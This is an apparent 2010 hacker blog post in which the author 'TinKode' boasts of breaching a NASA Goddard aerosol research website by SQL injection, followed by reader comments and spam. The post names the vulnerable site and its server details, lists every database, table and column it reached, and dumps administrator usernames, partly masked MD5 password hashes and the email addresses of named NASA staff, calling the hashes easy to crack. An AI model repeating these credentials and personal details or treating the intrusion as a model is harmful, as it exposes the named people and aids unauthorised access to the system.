The Center for Aerosol Research NASA website security issues
January 22nd, 2010 TinKode Posted in MySQL Injection | 27 Comments »
_ _ _____
| \ | | /\ / ____| /\
| \| | / \ | (___ / \
| . ` | / /\ \ \___ \ / /\ \
| |\ |/ ____ \ ____) / ____ \
|_| \_/_/ \_\_____/_/ \_\
#TinKode@Romania
The Center for Aerosol Research at NASA's Goddard Space Flight Center
The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.
Vulnerable website: http://aerocenter.gsfc.nasa.gov
I want to say that it was very hard to make this injection…
The webserver had good protection but wasn’t fully secured.
This kind only works manually , you can’t do it with apps.
In this picture you can see the visible columns:
Main informations:
#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/
Here we can see all databases:
[1] information_schema
[2] aerocenter
[3] car
[4] test
In this screenshot are all tables from all databases:
I don’t know exactly from which database are the tables… so I think I have not split them very well
Tables from “aerocenter” database:
[1] files
[2] milagro_users
[3] modis_wshop
[4] news
[5] news_files
[6] personnel
[7] siteupdate
[8] test
[9] users
[10] workshop_files
[11] yoram2007
[12] yoram2007_agenda
Tables from “car” database:
[1] car_content
[2] car_data_info
[3] car_data_missions
[4] car_data_overview
[5] car_data_quicklooks
[6] car_files
[7] car_homefeature
[8] car_homefeature_title
[9] car_homeimage
[10] car_homemission
[11] car_images
[12] car_news
[13] car_news_files
[14] car_pers_ordering
[15] car_personal_pages
[16] car_personnel
[17] car_publications,
[18] car_publications_authors
[19] car_publications_coauthors
[20] car_sections
[21] car_siteupdate
[22] car_subsections
[23] car_users
Tables from “test” database:
[1] content
[2] homeimage
[3] hometext
[4] images
[5] news
[6] news_files
[7] personnel
[8] publications
[9] publications_authors
[10] publications_coauthors
[11] sections
[12] siteupdate
[13] subsections
[14] users
Columns from all databases:
Here we have the same situation like with tables…
[1] filename
[2] title
[3] user
[4] actualname
[5] firstname
[6] lastname
[7] username
[8] userpassword
[9] userlevel
[10] status
[11] email
[12] phone
[13] affiliation
[14] focusgroup
[15] flag
[16] date_entered
[17] event_date
[18] time
[19] location
[20] art_title
[21] talk_title
[22] art_content
[23] article_id
[24] rank
[25] cal_lastname
[26] cal_firstname
[27] cal_middlename
[28] cal_email
[29] fax
[30] su_content
[31] last_updated
[32] badge
[33] citizen
[34] country
[35] content
[36] ordering
[37] section_title
[38] subsection_title
[39] header
[40] link_text_before
[41] linked_text
[42] link_url
[43] link_text_after
[44] html
[45] mission_id
[46] flight_number
[47] date
[48] time_flight
[49] time_data
[50] aircraft_type
[51] flight_scientist
[52] lat_long
[53] flight_map_lg
[54] modis_img_lg
[55] goes_img
[56] details
[57] flight_schedule
[58] anim_img_type
[59] static_img_type
[60] modis_credit
[61] flight_track_credit
[62] quicklook_credit
[63] details_credit
[64] modis_anim
[65] modis_aqua
[66] modis_terra
[67] goes_utc
[68] kmz_file
[69] mission_name
[70] year
[71] objective
[72] logo
[73] logo_width
[74] logo_height
[75] table_number
[76] data
[77] flight_num
[78] img_sm
[79] img_lg
[80] content_id
[81] image
[82] image_alt
[83] image_align
[84] active
[85] feature_title
[86] image_caption
[87] image_large
[88] id_ordering
[89] order_id
[90] page_id
[91] pers_id
[92] middlename
[93] profile_active
[94] profile_img
[95] class
[96] onlinestatus
[97] classification
[98] monthdays
[99] found_in
[101] eds
[102] publication
[103] volume
[104] issue
[105] pages
[106] pub_id
[107] author
[108] lab_member_auth
[109] coauthors
[110] lab_member_coauth
[111] sectionTitile
[112] parentSection
[113] cal_login
[114] cal_passwd
[115] profile
[116] profile_img1
[117] profile_img2
Admins accounts:
ghalusa:af2bb*******8418dfce03f4219318dc:ghalusa@climate.gsfc.nasa.gov
milagro:658ca4343e0f1c5************0be96:ghalusa@climate.gsfc.nasa.gov
ghalusa:ee79e81bd97d302baa934eb571c*****:Goran.N.Halusa@gsfc.nasa.gov
kleidman:34a9dbef02e31e86d1b71f6662c*****:Richard.Kleidman@nasa.gov
lremer:6b5376c7041eae26695ec259aa*****1:Lorraine.A.Remer@nasa.gov
paul:dc91e3f3529e02ff313dcaf49ce*****:paul.d.przyborski@nasa.gov
levy:e3321fb629d312948e9642f95df*****:Robert.C.Levy@nasa.gov
These hashes are md5() and they can be easily cracked.
Bye, TinKode! 
January 22nd, 2010 at 21:39
site:nasa.gov … wtf:) ur the best haxor ! ave ave
January 22nd, 2010 at 22:46
[...] This post was mentioned on Twitter by Insane, phr0nak. phr0nak said: RT @TinKode: NASA have problems again, Hacked, TinKode http://bit.ly/6VpyNE [...]
January 23rd, 2010 at 00:41
You are a dead man tinkode.
January 23rd, 2010 at 04:24
Social comments and analytics for this post…
This post was mentioned on Twitter by TinKode: NASA have problems again, Hacked, TinKode http://bit.ly/6VpyNE...
January 23rd, 2010 at 14:11
I find it funny what people consider “skilled”… Anyone can go through a site and test every param until they find a SQL Inj, nothing impressive. I’d like to know what was so hard about ‘making’ the injection? You couldn’t use your automated tools??
January 23rd, 2010 at 15:27
January 25th, 2010 at 21:08
[...] twierdzi, ?e webserwer by? ca?kiem nie?le zabezpieczony, a atak wymaga? wielkiego wysi?ku, ale [...]
January 27th, 2010 at 11:17
omg tink, esti cel mai tare :-j
January 27th, 2010 at 13:33
just seen this on twitter cheers for the info.
January 27th, 2010 at 23:49
I frequently don
January 28th, 2010 at 14:17
? ??? ??? ?????..
January 29th, 2010 at 05:27
y0 u plzo s74r7 h4ck1ng s0mething wh1ch 1s worth 1t?
L1k3 c11m473sk3p71c5!!!!!!!!1!!!!!!!!
January 29th, 2010 at 10:55
Saracii de la Nasa platesc 500.000 $ dar se fac de ras la lucruri deastea :-J
gj tinkode
January 29th, 2010 at 11:22
Hello.. I want to subscribe to your blog but I cannot find your rss link, please help. Thanks. – Jen
January 29th, 2010 at 11:31
Sure: http://tinkode.baywords.com/index.php/feed/
February 2nd, 2010 at 09:19
Hi how are you i really liked this.
February 2nd, 2010 at 23:48
A similar story, twitter.com got passwords stolen on sunday. It appears no site is unbreakable.
February 3rd, 2010 at 23:17
Hey. I don’t follow many blogs, but yours is of thefew I follow.Have a nice day!
February 4th, 2010 at 19:39
?????? ????? ????????.
February 4th, 2010 at 20:03
Tolles Blog. Das Design gefaellt mir, wo kann ich das denn finden?
February 6th, 2010 at 04:48
Just attempt to smile for regarding 2-3 mins then you can get back to work
February 7th, 2010 at 11:26
Keep posting stuff like this i really like it
February 8th, 2010 at 22:27
Hey, habe deine Seite gerade bei Bing entdeckt. Hast echt ein spitze Blog, werde sicherlich noch das ein oder andere mal hier reinschauen! Deine Posts sind auch echt super! Lieben Gruss
February 9th, 2010 at 01:28
Hi there ! If you need someone to make your product or service be developed in France, don’t hesitate to contact me. I’m based in Paris core next to the “Champs Elys
February 11th, 2010 at 02:01
For some reason only half of the post is being displayed, is it my browser or the site??
February 11th, 2010 at 07:37
Can you email me back, please. Thanks so much.
February 11th, 2010 at 09:07
Man I wish my blog was as well written as yours!
great work! I guess I am still learning and started on a tough topic, dating tips!